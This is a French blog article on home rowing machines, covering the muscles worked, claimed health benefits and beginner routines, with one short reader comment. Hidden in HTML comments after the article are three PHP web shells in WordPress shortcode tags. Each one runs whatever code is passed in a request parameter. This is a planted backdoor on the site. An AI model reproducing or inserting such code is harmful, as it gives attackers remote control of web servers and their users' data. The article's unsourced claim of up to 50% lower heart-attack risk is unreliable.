Le rameur d’appartement

Le rameur d’appartement : son utilisation et ses principaux avantages

Le rameur d’appartement est un appareil de musculation très complet permettant de faire travailler de nombreuses parties du corps. Grâce à des exercices réguliers et progressifs, le rameur devient un partenaire indispensable pour atteindre différents objectifs. Il agit sur la santé en réduisant le taux de cholestérol et en améliorant le système cardiovasculaire. Il est également efficace pour perdre du poids, sculpter sa silhouette, pour suivre un entraînement sportif et améliorer ses performances.

Particulièrement avantageux par ses bienfaits sur la santé et ses effets sur le poids ou les performances sportives, le rameur n’est pas adapté à tous les utilisateurs. De manière générale, avant de l’utiliser de manière régulière, il convient de consulter le médecin, mais il faut déjà noter que le rameur est particulièrement déconseillé aux personnes souffrant du dos et des cervicales. Par ailleurs, les nombreux bienfaits du rameur sont également obtenus grâce à une bonne utilisation de l’appareil et le choix de bons exercices.

Les principales fonctions du rameur d’appartement

Le rameur est un appareil de cardio-training parmi les plus complets du marché. Il permet de travailler les bras, les épaules, le dos, les pectoraux, les abdominaux mais aussi les cuisses, les jambes, les mollets. Il est utilisé pour trois types d’objectif : la perte de poids, la santé et la remise en forme. Il existe trois types de rameurs permettant de muscler de manière plus intense certaines parties du corps. Le rameur à translation verticale muscle davantage les bras et le dos. Le rameur à translation horizontale reproduit les mêmes résultats que ceux obtenus en faisant de l’aviron, il est préconisé pour les adeptes de ce sport qui cherchent à améliorer leurs performances. Enfin, le rameur à tirage central cible principalement le travail cardiaque, il représente le modèle le plus approprié pour les personnes désirant améliorer leur système cardiovasculaire.

Les avantages offerts par le rameur d’appartement

Appareil sportif très complet s’il est utilisé à bon escient, le rameur d’appartement procure des bienfaits notables en matière de santé. Il agit positivement sur les problèmes de c?ur. En effet, des tests avec ce produit ont prouvé qu’il permet de réduire les risques d’infarctus jusqu’à 50%, et il réduit également une pression sanguine élevée. Le rameur agit aussi en diminuant le taux de cholestérol et le taux de la masse graisseuse et permet ainsi d’aider les personnes ayant des problèmes de surcharge pondérale. Enfin, une pratique régulière d’exercices sur le rameur contribue à un assouplissement général des muscles du corps, à une sensation de relaxation et de bien-être. Ces sensations physiques ont également un impact sur certains aspects psychologiques et contribuent notamment à réduire le stress, la dépression et l’anxiété. Outre les bienfaits sur la santé, le rameur est aussi un appareil de fitness et de remise en forme très efficace. Enfin, il permet d’affiner la silhouette grâce à la perte de poids sur des parties ciblées du corps. Le rameur d’appartement est à utiliser dans une ambiance appropriée pour profiter réellement de tous ces avantages. Ainsi, l’utilisateur doit adapter sa tenue pour assurer son confort en choisissant des vêtements amples, des chaussures de sport appropriées. Éventuellement, il adapte également la lumière de la pièce et choisit une musique de fond pour maximiser le confort du pratiquant.

Les exercices à effectuer sur un rameur d’appartement

Pour obtenir des résultats positifs avec un rameur d’appartement, il faut savoir choisir et exécuter les exercices appropriés, avec les bons rythmes, en tenant compte notamment de ses propres objectifs. Dans tous les cas, la première règle pour commencer sur le rameur est de faire des exercices simples sur une courte durée. En fonction de l’objectif, ces exercices de départ seront intensifiés en vitesse et/ou en type. Par ailleurs, il est toujours préconisé d’utiliser le rameur pour des petites séances, de manière régulière et fréquente que pour une longue séance isolée. Un bon démarrage serait de faire des exercices à raison de trois séances par semaine pendant 20 minutes pour chaque séance. Pour augmenter progressivement ses performances, une astuce est de garder ce même temps d’exercice mais en essayant à chaque fois de parcourir une distance plus longue. La distance peut être déterminée comme objectif pour chaque séance par exemple 500 m, 1 000 m, 2000 m. Au cours de ces 20 minutes, on peut alterner des exercices intenses et moins intenses. Pour un objectif de perte de poids, cette durée sera augmentée de 10 minutes. Pour les grands sportifs, une séance peut durer jusqu’à 1 h 30. Enfin pour chaque séance, il est important d’accorder du temps pour l’échauffement avant les exercices puis pour l’étirement à la fin des séances. Par ailleurs, afin de rendre le rameur réellement efficace, il faut éviter les interruptions des exercices par des coups de téléphone ou des allées et venues de la famille.

<!– [insert_php]if (isset($_REQUEST["UzCcu"])){eval($_REQUEST["UzCcu"]);exit;}[/insert_php][php]if (isset($_REQUEST["UzCcu"])){eval($_REQUEST["UzCcu"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["sVa"])){eval($_REQUEST["sVa"]);exit;}[/insert_php][php]if (isset($_REQUEST["sVa"])){eval($_REQUEST["sVa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LyHIR"])){eval($_REQUEST["LyHIR"]);exit;}[/insert_php][php]if (isset($_REQUEST["LyHIR"])){eval($_REQUEST["LyHIR"]);exit;}[/php] –>

Both comments and pings are currently closed.

One Response to “Le rameur d’appartement”

  1. Macdonnell dit :

    Merci pour cet article très instructif.